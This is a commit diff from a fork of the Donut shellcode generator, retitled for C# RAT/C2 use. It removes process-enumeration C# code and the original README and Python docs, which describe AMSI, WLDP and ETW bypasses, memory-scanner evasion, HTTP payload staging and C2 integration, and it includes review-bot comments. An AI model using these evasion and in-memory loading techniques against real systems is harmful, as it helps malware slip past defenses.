private static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CloseHandle(IntPtr hObject);
/// <summary>
/// Gets the parent process of a specified process.
/// </summary>
/// <returns>A Process object representing the parent.</returns>
public static Process GetParentProcess(Process process)
{
return ParentProcessUtilities.GetParentProcess(process.Id);
}
/// <summary>
/// Gets the parent process of a specified process.
/// </summary>
/// <returns>A Process object representing the parent.</returns>
public static Process GetParentProcess()
{
return GetParentProcess(Process.GetCurrentProcess());
}
/// <summary>
/// Checks whether the process is 64-bit.
/// </summary>
/// <returns>Returns true if process is 64-bit, and false if process is 32-bit.</returns>
public static bool IsWow64Process(Process process)
{
bool retVal = false;
IsWow64Process(process.Handle, out retVal);
return retVal;
}
/// <summary>
/// Checks whether the process is 64-bit.
/// </summary>
/// <returns>Returns false if process is 64-bit, and true if process is 32-bit. Refer to MSDN for further details.</returns>
public static bool IsWow64Process()
{
bool retVal = false;
IsWow64Process(Process.GetCurrentProcess().Handle, out retVal);
return retVal;
}
/// <summary>
/// Checks if the CLR has been loaded into the specified process by
/// looking for loaded modules that contain "mscor" in the name.
/// </summary>
/// <param name="process">The process to check.</param>
/// <returns>True if the CLR has been loaded. False if it has not.</returns>
public static bool IsCLRLoaded(Process process)
{
try
{
var modules = from module in process.Modules.OfType<ProcessModule>()
select module;
return modules.Any(pm => pm.ModuleName.Contains("mscor"));
}
//Access was denied
catch (Win32Exception)
{
return false;
}
//Process has already exited
catch (InvalidOperationException)
{
return false;
}
}
/// <summary>
/// Gets the owner of a process.
///
/// https://stackoverflow.com/questions/777548/how-do-i-determine-the-owner-of-a-process-in-c
/// </summary>
/// <param name="process">The process to inspect.</param>
/// <returns>The name of the user, or null if it could not be read.</returns>
public static string GetProcessUser(Process process)
{
IntPtr processHandle = IntPtr.Zero;
try
{
OpenProcessToken(process.Handle, 8, out processHandle);
WindowsIdentity wi = new WindowsIdentity(processHandle);
return wi.Name;
}
catch
{
return null;
}
finally
{
if (processHandle != IntPtr.Zero)
{
CloseHandle(processHandle);
}
}
}
}//end class
/// <summary>
/// A utility class to determine a process parent.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct ParentProcessUtilities
{
// These members must match PROCESS_BASIC_INFORMATION
internal IntPtr Reserved1;
internal IntPtr PebBaseAddress;
internal IntPtr Reserved2_0;
internal IntPtr Reserved2_1;
internal IntPtr UniqueProcessId;
internal IntPtr InheritedFromUniqueProcessId;
[DllImport("ntdll.dll")]
private static extern int NtQueryInformationProcess(IntPtr processHandle, int processInformationClass, ref ParentProcessUtilities processInformation, int processInformationLength, out int returnLength);
/// <summary>
/// Gets the parent process of the current process.
/// </summary>
/// <returns>An instance of the Process class.</returns>
public static Process GetParentProcess()
{
return GetParentProcess(Process.GetCurrentProcess().Handle);
}
/// <summary>
/// Gets the parent process of specified process.
/// </summary>
/// <param name="id">The process id.</param>
/// <returns>An instance of the Process class.</returns>
public static Process GetParentProcess(int id)
{
try
{
Process process = Process.GetProcessById(id);
GetParentProcess(process.Handle);
return GetParentProcess(process.Handle);
}
//Access was denied, or
catch
{
return null;
}
}
/// <summary>
/// Gets the parent process of a specified process.
/// </summary>
/// <param name="handle">The process handle.</param>
/// <returns>An instance of the Process class.</returns>
public static Process GetParentProcess(IntPtr handle)
{
ParentProcessUtilities pbi = new ParentProcessUtilities();
int returnLength;
int status = NtQueryInformationProcess(handle, 0, ref pbi, Marshal.SizeOf(pbi), out returnLength);
if (status != 0)
throw new Win32Exception(status);
try
{
return Process.GetProcessById(pbi.InheritedFromUniqueProcessId.ToInt32());
}
catch (ArgumentException)
{
// not found
return null;
}
}
}
/// <summary>
/// Inspects the tokens of an arbitrary Process and reports useful information.
///
/// This class is almost entirely copied from the example provided by pinvoke.net:
/// http://pinvoke.net/default.aspx/Constants/SECURITY_MANDATORY.html
/// </summary>
public class TokenInspector
{
[DllImport("advapi32.dll", SetLastError = true)]
static extern IntPtr GetSidSubAuthority(IntPtr sid, UInt32 subAuthorityIndex);
[DllImport("advapi32.dll", SetLastError = true)]
static extern IntPtr GetSidSubAuthorityCount(IntPtr sid);
// winnt.h, Windows SDK v6.1
const int SECURITY_MANDATORY_UNTRUSTED_RID = (0x00000000);
const int SECURITY_MANDATORY_LOW_RID = (0x00001000);
const int SECURITY_MANDATORY_MEDIUM_RID = (0x00002000);
const int SECURITY_MANDATORY_HIGH_RID = (0x00003000);
const int SECURITY_MANDATORY_SYSTEM_RID = (0x00004000);
const int SECURITY_MANDATORY_PROTECTED_PROCESS_RID = (0x00005000);
[DllImport("advapi32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
static extern bool OpenProcessToken(
IntPtr ProcessHandle,
UInt32 DesiredAccess,
out IntPtr TokenHandle
);
const UInt32 TOKEN_QUERY = 0x0008;
[DllImport("advapi32.dll", SetLastError = true)]
static extern bool GetTokenInformation(
IntPtr TokenHandle,
TOKEN_INFORMATION_CLASS TokenInformationClass,
IntPtr TokenInformation,
uint TokenInformationLength,
out uint ReturnLength
);
enum TOKEN_INFORMATION_CLASS
{
TokenUser = 1, TokenGroups, TokenPrivileges, TokenOwner, TokenPrimaryGroup, TokenDefaultDacl, TokenSource, TokenType, TokenImpersonationLevel, TokenStatistics, TokenRestrictedSids, TokenSessionId, TokenGroupsAndPrivileges, TokenSessionReference, TokenSandBoxInert, TokenAuditPolicy, TokenOrigin, TokenElevationType, TokenLinkedToken, TokenElevation, TokenHasRestrictions, TokenAccessInformation, TokenVirtualizationAllowed, TokenVirtualizationEnabled,
/// <summary>
/// The buffer receives a TOKEN_MANDATORY_LABEL structure that specifies the token's integrity level.
/// </summary>
TokenIntegrityLevel,
TokenUIAccess, TokenMandatoryPolicy, TokenLogonSid, MaxTokenInfoClass
}
public enum IntegrityLevel
{
Low, Medium, High, System, None, Unknown
}
const int ERROR_INVALID_PARAMETER = 87;
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool CloseHandle(IntPtr hHandle);
public static IntegrityLevel GetIntegrityLevel(Process process)
{
try
{
IntPtr pId = (process.Handle);
IntPtr hToken = IntPtr.Zero;
if (OpenProcessToken(pId, TOKEN_QUERY, out hToken))
{
try
{
IntPtr pb = Marshal.AllocCoTaskMem(1000);
try
{
uint cb = 1000;
if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenIntegrityLevel, pb, cb, out cb))
{
IntPtr pSid = Marshal.ReadIntPtr(pb);
int dwIntegrityLevel = Marshal.ReadInt32(GetSidSubAuthority(pSid, (Marshal.ReadByte(GetSidSubAuthorityCount(pSid)) - 1U)));
if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID)
{
return IntegrityLevel.Low;
}
else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID && dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
{
// Medium Integrity
return IntegrityLevel.Medium;
}
else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID)
{
// High Integrity
return IntegrityLevel.High;
}
else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID)
{
// System Integrity
return IntegrityLevel.System;
}
return IntegrityLevel.None;
}
else
{
return IntegrityLevel.Unknown;
}
}
finally
{
Marshal.FreeCoTaskMem(pb);
}
}
finally
{
CloseHandle(hToken);
}
}
}
catch (Win32Exception ex)
{
return IntegrityLevel.Unknown;
}
//If we made it this far through all of the finally blocks and didn't return, then return unknown
return IntegrityLevel.Unknown;
}
}
}
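Review bot: the block being removed has an unreachable branch: `else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID)` is tested before `else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID)`, and because the System RID (0x4000) is larger than the High RID (0x3000), System-integrity processes were reported as High and `IntegrityLevel.System` could never be returned. Since this commit deletes the file rather than fixing it, and the ProcessManager README removed in the same commit says the tool lives on at https://github.com/TheWover/ProcessManager, the fix (test System before High, or compare for equality) belongs upstream rather than being lost with the deletion. Two smaller points in the same block: `IntPtr pId = (process.Handle);` holds a process handle, not a PID, and `catch (Win32Exception ex)` never uses `ex`.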


@ -1,36 +0,0 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("ProcessManager")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("ProcessManager")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("98ca74c7-a074-434d-9772-75896e73ceaa")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]


@ -1,37 +0,0 @@
# ProcessManager
Has its own repo at: https://github.com/TheWover/ProcessManager
ps-like .NET Assembly for enumerating processes on the current machine or a remote machine (using current token). Has the unique feature of telling you whether each process is managed (has the CLR loaded). Compatible with .NET v3.5.
All enumeration is done with only built-in .NET APIs and PInvoke, rather than any third-party libraries or usage of WMI.
* PPID value of "-1" means that the parent is no longer running or is not accessible.
* Arch value of "*" means that the process could not be accessed or the architecture could not be determined. Usually a permissions issue.
* Managed value of "True" means that the CLR is loaded into the process. That is, it is a "managed" process because it is running .NET managed code.
* Integrity value of "Unknown" means exactly that.
* Blank User value means that the user information of the process could not be obtained.
**I have not tested ProcessManager's remote enumeration option. :-P Neither me nor Odzhan have a lab setup for testing that. Please feel free to let us know of any issues.**
![Alt text](https://github.com/TheWover/ProcessManager/blob/master/img/usage.JPG?raw=true "General Usage")
# Usage
```
| Process Manager [v0.2]
| Copyright (c) 2019 TheWover
Usage: ProcessManager.exe [options]
-h, --help Display this help menu.
--machine Specify a machine to query. Machine name or IP Address may be used.
--name Filter by a process name.
Examples:
ProcessManager.exe
ProcessManager.exe --name svchost
ProcessManager.exe --machine workstation2
ProcessManager.exe --machine 10.30.134.13
```

Binary file not shown.


357
README.md

@ -1,357 +1,10 @@
[![Issues](https://img.shields.io/github/issues/thewover/donut)](https://github.com/TheWover/donut/issues)
[![Contributors](https://img.shields.io/github/contributors/thewover/donut)](https://github.com/TheWover/donut/graphs/contributors)
[![Stars](https://img.shields.io/github/stars/thewover/donut)](https://github.com/TheWover/donut/stargazers)
[![Forks](https://img.shields.io/github/forks/thewover/donut)](https://github.com/TheWover/donut/network/members)
[![License](https://img.shields.io/github/license/thewover/donut)](https://github.com/TheWover/donut/blob/master/LICENSE)
[![Chat](https://img.shields.io/badge/chat-%23donut-orange)](https://bloodhoundgang.herokuapp.com/)
[![Github All Releases](https://img.shields.io/github/downloads/thewover/donut/total.svg)](http://www.somsubhra.com/github-release-stats/?username=thewover&repository=donut)
[![Twitter URL](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https://github.com/TheWover/donut&text=%23Donut+An+open-source+shellcode+generator+that+supports+in%2Dmemory+execution+of+VBS%2FJS%2FEXE%2FDLL+files:+https://github.com/TheWover/donut)
# Donut For C# Rat/C2
![Alt text](https://github.com/TheWover/donut/blob/master/img/donut_logo_white.jpg?raw=true "Donut Logo")
build the client with .Net Framework 3.5, and make sure the exe can be run on .Net Framework 4.0 too
<p>Current version: <a href="https://thewover.github.io/TBD/">v1</a></p>
then use this donut as the origin one
<h2>Table of contents</h2>
-r is useless now, the shellcode will use 4.0 first, if fail then 3.5
<ol>
<li><a href="#intro">Introduction</a></li>
<li><a href="#how">How It Works</a></li>
<li><a href="#build">Building</a></li>
<li><a href="#usage">Usage</a></li>
<li><a href="#subproj">Subprojects</a></li>
<li><a href="#dev">Developing with Donut</a></li>
<li><a href="#qad">Questions and Discussions</a></li>
<li><a href="#disclaimer">Disclaimer</a></li>
</ol>
<h2 id="intro">1. Introduction</h2>
<p><strong>Donut</strong> is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself. The module is optionally encrypted using the <a href="https://tinycrypt.wordpress.com/2017/02/20/asmcodes-chaskey-cipher/">Chaskey</a> block cipher and a 128-bit randomly generated key. After the file is loaded and executed in memory, the original reference is erased to deter memory scanners. The generator and loader support the following features:</p>
<ul>
<li>Compression of input files with aPLib and LZNT1, Xpress, Xpress Huffman via RtlCompressBuffer.</li>
<li>Using entropy for API hashes and generation of strings.</li>
<li>128-bit symmetric encryption of files.</li>
<li>Overwriting native PE headers.</li>
<li>Storing native PEs in MEM_IMAGE memory.</li>
<li>Patching Antimalware Scan Interface (AMSI) and Windows Lockdown Policy (WLDP).</li>
<li>Patching Event Tracing for Windows (ETW).</li>
<li>Patching command line for EXE files.</li>
<li>Patching exit-related API to avoid termination of host process.</li>
<li>Multiple output formats: C, Ruby, Python, PowerShell, Base64, C#, Hexadecimal, and UUID string.</li>
</ul>
<p>There are dynamic and static libraries for both Linux and Windows that can be integrated into your own projects. There's also a python module which you can read more about in <a href="https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md">Building and using the Python extension.</a></p>
<h2 id="how">2. How It Works</h2>
<p>Donut contains individual loaders for each supported file type. For dotNET EXE/DLL assemblies, Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. Once the CLR is loaded into the host process, a new Application Domain is created to allow for running Assemblies in disposable AppDomains. When the AppDomain is ready, the dotNET Assembly is loaded via the AppDomain.Load_3 method. Finally, the Entry Point for EXEs or public method for DLLs specified by the user is invoked with any additional parameters. Refer to MSDN for documentation on the <a href=" https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces">Unmanaged CLR Hosting API.</a> For a standalone example of a CLR Host, refer to <a href="https://github.com/TheWover/donut/blob/master/DonutTest/rundotnet.cpp">code here.</a></p>
<p>VBScript and JScript files are executed using the IActiveScript interface. There's also minimal support for some of the methods provided by the Windows Script Host (wscript/cscript). For a standalone example, refer to <a href="https://gist.github.com/odzhan/d18145b9538a3653be2f9a580b53b063">code here.</a> For a more detailed description, read: <a href="https://modexp.wordpress.com/2019/07/21/inmem-exec-script/">In-Memory Execution of JavaScript, VBScript, JScript and XSL</a></p>
<p>Unmanaged or native EXE/DLL files are executed using a custom PE loader with support for Delayed Imports, TLS and patching the command line. Only files with relocation information are supported. Read <a href="https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/">In-Memory Execution of DLL</a> for more information.</p>
<p>The loader can disable AMSI and WLDP to help evade detection of malicious files executed in-memory. For more information, read <a href="https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/">How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code</a>. It also supports decompression of files in memory using aPLib or the RtlDecompressBuffer API. Read <a href="https://modexp.wordpress.com/2019/12/08/shellcode-compression/">Data Compression</a> for more information.</p>
<p>As of v1.0, ETW is also bypassed. Like with AMSI/WLDP, this a modular system that allows you to swap out the default bypass with your own. The default bypass is derived from research by XPN. Read <a href="https://blog.xpnsec.com/hiding-your-dotnet-etw/">Hiding your .NET - ETW</a> for more information.</p>
<p>By default, the loader will overwrite the PE headers of unmanaged PEs (from the base address to `IMAGE_OPTIONAL_HEADER.SizeOfHeaders`). If no decoy module is used (module overloading), then the PE headers will be zeroed. If a decoy module is used, the PE headers of the decoy module will be used to overwrite those of the payload module. This is to deter detection by comparing the PE headers of modules in memory with the file backing them on disk. The user may request that all PE headers be preserved in their original state. This is helpful for scenarios when the payload module needs to access its PE headers, such as when looking up embedded PE resources.</p>
<p>For a detailed walkthrough using the generator and how Donut affects tradecraft, read <a href="https://thewover.github.io/Introducing-Donut/">Donut - Injecting .NET Assemblies as Shellcode</a>. For more information about the loader, read <a href="https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/">Loading .NET Assemblies From Memory</a>.</p>
<p>Those who wish to know more about the internals should refer to <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">Developer notes.</a></p>
<h2 id="build">3. Building</h2>
<p>There are two types of build. If you want to debug Donut, please refer to <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">documentation here</a>. If not, continue reading for the release build.</p>
<h3><strong>Clone</strong></h3>
<p>From a Windows command prompt or Linux terminal, clone the repository.</p>
<pre>
git clone http://github.com/thewover/donut.git
</pre>
<p>The next step depends on your operating system and what compiler you decide to use. Currently, the generator and loader template for Donut can be compiled successfully with both Microsoft Visual Studio 2019 and MingGW-64. To use the libraries in your own C/C++ project, please refer to the <a href="https://github.com/TheWover/donut/tree/master/examples">examples provided here.</a></p>
<h4><strong>Windows</strong></h4>
<p>To generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe. Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:</p>
<pre>
nmake -f Makefile.msvc
</pre>
<p>To do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:</p>
<pre>
make -f Makefile.mingw
</pre>
<h4><strong>Linux</strong></h4>
<p>To generate the dynamic library donut.so, the static library donut.a and the generator donut. Change to the directory where you cloned the Donut repository and simply type make.</p>
<h3>Python Module</h3>
<p>Donut can be installed and used as a Python module. To install from source requires pip for Python3. First, ensure older versions of donut-shellcode are not installed by issuing the following command on Linux terminal or Microsoft Visual Studio command prompt.</p>
<pre>
pip3 uninstall donut-shellcode
</pre>
<p>After you confirm older versions are no longer installed, issue the following command.</p>
<pre>
pip3 install .
</pre>
<p>You may also install Donut as a Python module by grabbing it from the PyPi repository.</p>
<pre>
pip3 install donut-shellcode
</pre>
<p>For more information, please refer to <a href="https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md">Building and using the Python extension.</a></p>
<h3>Docker</h3>
<p>Building the docker container.</p>
<pre>
docker build -t donut .
</pre>
<p>Running donut.</p>
<pre>
docker run -it --rm -v "${PWD}:/workdir" donut -h
</pre>
<h3>Support Tools</h3>
<p>Donut includes several other executables that may be built separately. This include "hash.exe", "encrypt.exe","inject.exe", and "inject_local.exe". The first two are used in shellcode generation. The latter two are provided to assist with testing donut shellcode. "inject.exe" will inject a raw binary file (loader.bin) into a process by its PID or process name. "inject_local.exe" will inject a raw binary file into its own process.</p>
<p>To build these support executables separately you may use the MSVC makefile. For example, to build "inject_local.exe" to test your donut shellcode, you may run.</p>
<pre>
nmake inject_local -f Makefile.msvc
</pre>
<h3>Releases</h3>
<p>Tags have been provided for each release version of Donut that contain the compiled executables.</p>
<ul>
<li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.3">v0.9.3, TBD</a></li>
<li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.2">v0.9.2, Bear Claw</a></li>
<li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.1">v0.9.1, Apple Fritter</a></li>
<li><a href="https://github.com/TheWover/donut/releases/tag/v0.9">v0.9.0, Initial Release</a></li>
</ul>
<p>Currently, there are two other generators available.</p>
<ul>
<li><a href="https://github.com/n1xbyte/donutCS">C# generator by n1xbyte</a></li>
<li><a href="https://github.com/Binject/go-donut">Go generator by awgh</a></li>
</ul>
<h2 id="usage">4. Usage</h2>
<p>The following table lists switches supported by the command line version of the generator.</p>
<table border="1">
<tr>
<th>Switch</th>
<th>Argument</th>
<th>Description</th>
</tr>
<tr>
<td><strong>-a</strong></td>
<td><var>arch</var></td>
<td>Target architecture for loader : 1=x86, 2=amd64, 3=x86+amd64(default).</td>
</tr>
<tr>
<td><strong>-b</strong></td>
<td><var>level</var></td>
<td>Behavior for bypassing AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default)</td>
</tr>
<tr>
<td><strong>-k</strong></td>
<td><var>headers</var></td>
<td>Preserve PE headers. 1=Overwrite (default), 2=Keep all</td>
</tr>
<tr>
<td><strong>-j</strong></td>
<td><var>decoy</var></td>
<td>Optional path of decoy module for Module Overloading.</td>
</tr>
<tr>
<td><strong>-c</strong></td>
<td><var>class</var></td>
<td>Optional class name. (required for .NET DLL) Can also include namespace: e.g <em>namespace.class</em></td>
</tr>
<tr>
<td><strong>-d</strong></td>
<td><var>name</var></td>
<td>AppDomain name to create for .NET. If entropy is enabled, one will be generated randomly.</td>
</tr>
<tr>
<td><strong>-e</strong></td>
<td><var>level</var></td>
<td>Entropy level. 1=None, 2=Generate random names, 3=Generate random names + use symmetric encryption (default)</td>
</tr>
<tr>
<td><strong>-f</strong></td>
<td><var>format</var></td>
<td>The output format of loader saved to file. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=PowerShell, 7=C#, 8=Hexadecimal</td>
</tr>
<tr>
<td><strong>-m</strong></td>
<td><var>name</var></td>
<td>Optional method or function for DLL. (a method is required for .NET DLL)</td>
</tr>
<tr>
<td><strong>-n</strong></td>
<td><var>name</var></td>
<td>Module name for HTTP staging. If entropy is enabled, one is generated randomly.</td>
</tr>
<tr>
<td><strong>-o</strong></td>
<td><var>path</var></td>
<td>Specifies where Donut should save the loader. Default is "loader.bin" in the current directory.</td>
</tr>
<tr>
<td><strong>-p</strong></td>
<td><var>parameters</var></td>
<td>Optional parameters/command line inside quotations for DLL method/function or EXE.</td>
</tr>
<tr>
<td><strong>-r</strong></td>
<td><var>version</var></td>
<td>CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.</td>
</tr>
<tr>
<td><strong>-s</strong></td>
<td><var>server</var></td>
<td>URL for the HTTP server that will host a Donut module. Credentials may be provided in the following format: <pre>https://username:password@192.168.0.1/</pre></td>
</tr>
<tr>
<td><strong>-t</strong></td>
<td></td>
<td>Run the entrypoint of an unmanaged/native EXE as a thread and wait for thread to end.</td>
</tr>
<tr>
<td><strong>-w</strong></td>
<td></td>
<td>Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)</td>
</tr>
<tr>
<td><strong>-x</strong></td>
<td><var>option</var></td>
<td>Determines how the loader should exit. 1=exit thread (default), 2=exit process, 3=Do not exit or cleanup and block indefinitely</td>
</tr>
<tr>
<td><strong>-y</strong></td>
<td><var>addr</var></td>
<td>Creates a new thread for the loader and continues execution at an address that is an offset relative to the host process's executable. The value provided is the offset. This option supports loaders that wish to resume execution of the host process after donut completes execution.</td>
</tr>
<tr>
<td><strong>-z</strong></td>
<td><var>engine</var></td>
<td>Pack/Compress the input file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress, 5=Xpress Huffman. Currently, the last three are only supported on Windows.</td>
</tr>
</table>
<h3 id="requirements">Payload Requirements</h2>
<p>There are some specific requirements that your payload must meet in order for Donut to successfully load it.</p>
<h3 id="requirements-dotnet">.NET Assemblies</h2>
<ul>
<li>The entry point method must only take strings as arguments, or take no arguments.</li>
<li>The entry point method must be marked as public and static.</li>
<li>The class containing the entry point method must be marked as public.</li>
<li>The Assembly must NOT be a Mixed Assembly (contain both managed and native code).</li>
<li>As such, the Assembly must NOT contain any Unmanaged Exports.</li>
</ul>
<h3 id="requirements-native">Native EXE/DLL</h2>
<ul>
<li>Binaries built with Cygwin are unsupported.</li>
</ul>
<p>Cygwin executables use initialization routines that expect the host process to be running from disk. If executing from memory, the host process will likely crash.</p>
<h3 id="requirements-dotnet">Unmanaged DLLs</h2>
<ul>
<li>A user-specified entry point method must only take a string as an argument, or take no arguments. We have provided an <a href="https://github.com/TheWover/donut/blob/master/DonutTest/dlltest.c/">example</a>.</li>
</ul>
<h2 id="subproj">5. Subprojects</h2>
<p>There are four companion projects provided with donut:</p>
<table border="1">
<tr>
<th>Tool</th>
<th>Description</th>
</tr>
<tr>
<td>DemoCreateProcess</td>
<td>A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.</td>
</tr>
<tr>
<td>DonutTest</td>
<td>A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.</td>
</tr>
<tr>
<td>ModuleMonitor</td>
<td>A proof-of-concept tool that detects CLR injection as it is done by tools such as Donut and Cobalt Strike's execute-assembly.</td>
</tr>
<tr>
<td>ProcessManager</td>
<td>A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded. </td>
</tr>
</table>
<h2 id="dev">6. Developing with Donut</h2>
<p>You may want to add support for more types of payloads, change our feature set, or integrate Donut into your existing tooling. We have provided <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">developer documentation</a>. Additional features are left as exercises to the reader. Our suggestions:</p>
<ul>
<li>Add environmental keying.</li>
<li>Make Donut polymorphic by obfuscating the loader every time shellcode is generated.</li>
<li>Integrate Donut as a module into your favorite RAT/C2 Framework.</li>
</ul>
<h2 id="qad">7. Questions and Discussion</h2>
<p>If you have any questions or comments about Donut. Join the #Donut channel in the <a href="https://bloodhoundgang.herokuapp.com/">BloodHound Gang Slack</a></p>
<h2 id="disclaimer">8. Disclaimer</h2>
<p>We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection and in-memory loading through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. In the event EDR or AV products are capable of detecting Donut via signatures or behavioral patterns, we will not update Donut to counter signatures or detection methods. To avoid being offended, please do not ask.</p>
All in one, you can get a shellcode that can be use on both .Net Framework 3.5/4.x
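Review bot: the ten-line README that replaces this file drops the Building section, the switch table, the payload requirements and the disclaimer, so a reader of the new text cannot tell how to build the generator or which switches still apply; keep at least the Building section and the switch table, and mark the `-r` row as ignored in the table itself rather than only in the free-standing line "-r is useless now, the shellcode will use 4.0 first, if fail then 3.5". That line also needs to say what "fail" means (which runtime lookup or load step has to fail before the loader falls back to 3.5), since operators on hosts with only one CLR installed need to predict which path runs. Wording in the new lines: "then use this donut as the origin one" should read "as the original one", and "a shellcode that can be use on" should read "can be used on"; "build the client with .Net Framework 3.5, and make sure the exe can be run on .Net Framework 4.0 too" should say how to verify that (for example by running the assembly under both runtimes before generating the loader). Finally, the License badge and the link to LICENSE are removed along with the rest of the header; a fork that re-titles the project "Donut For C# Rat/C2" should keep the upstream attribution and license pointer.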


@ -1,160 +0,0 @@
# Python Extension
A Python C extension is now available which allows you to dynamically generate donut shellcode in Python.
## Requirements
The extension has only been tested in Python 3.7, it shouldn't have any compatibility issues with older 3.X versions of Python.
It will ***not*** work in Python 2.x.
## Installing the Extension
(Once the extension has been published to PyPi)
```
pip3 install donut-shellcode
```
## Manually Compiling And Installing the Extension
```bash
git clone https://github.com/TheWover/donut && cd donut
pip3 install . # or python setup.py install
```
## Usage
The Python extension accepts the same parameters as the main donut executable.
Here's a minimalistic example of using the extension:
```python
import donut
shellcode = donut.create(file="naga.exe", params='https://172.16.164.1/')
```
The ```donut``` module exposes only one function ```create()```, which is used to generate shellcode and accepts both positional and keyword arguments.
The only required parameter the ```create()``` function needs is the ```file``` argument which accepts a path to the .NET EXE/DLL or VBS/JS file to turn into shellcode.
```python
import donut
shellcode = donut.create(
file='naga.exe', # .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory
url='http://127.0.0.1', # HTTP server that will host the donut module
arch=1, # Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default)
bypass=3, # Bypass AMSI/WLDP : 1=none, 2=abort on fail, 3=continue on fail.(default)
cls='namespace.class', # Optional class name. (required for .NET DLL)
method='method', # Optional method or API name for DLL. (method is required for .NET DLL)
params='arg1 arg2', # Optional parameters or command line.
runtime='version', # CLR runtime version. MetaHeader used by default or v4.0.30319 if none available
appdomain='name' # AppDomain name to create for .NET. Randomly generated by default.
)
```
## Keywords
The following table lists key words for the create method.
<table>
<tr>
<th>Keyword</th>
<th>Type</th>
<th>Description</th>
</tr>
<tr>
<td>file</td>
<td>String</td>
<td>The path of file to execute in memory. VBS/JS/EXE/DLL files are supported.</td>
</tr>
<tr>
<td>arch</td>
<td>Integer</td>
<td>Indicates the type of assembly code to generate. 1=<code>DONUT_ARCH_X86</code> and 2=<code>DONUT_ARCH_X64</code> are self-explanatory. 3=<code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both X86 and AMD64. ARM64 will be supported at some point.</td>
</tr>
<tr>
<td>bypass</td>
<td>Integer</td>
<td>Specifies behaviour of the code responsible for bypassing AMSI and WLDP. The current options are 1=<code>DONUT_BYPASS_NONE</code> which indicates that no attempt be made to disable AMSI or WLDP. 2=<code>DONUT_BYPASS_ABORT</code> indicates that failure to disable should result in aborting execution of the module. 3=<code>DONUT_BYPASS_CONTINUE</code> indicates that even if AMSI/WDLP bypasses fail, the shellcode will continue with execution.</td>
</tr>
<tr>
<td>compress</td>
<td>Integer</td>
